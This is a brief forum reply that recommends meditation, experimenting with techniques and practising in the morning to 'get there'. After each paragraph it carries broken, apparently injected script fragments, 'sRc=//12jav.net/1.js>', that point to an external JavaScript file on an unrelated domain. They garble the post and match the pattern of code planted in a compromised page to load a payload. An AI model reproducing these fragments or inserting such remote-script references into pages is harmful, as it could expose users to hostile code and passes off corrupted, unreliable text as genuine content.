Help getting there please

I manage to get there through meditation which seems to be the most common suggestion made here on the site. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>

Try different techniques or do it at a time you are not tired. Some say in the morning is the best times. Just experiment with different things to see what works best for you. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
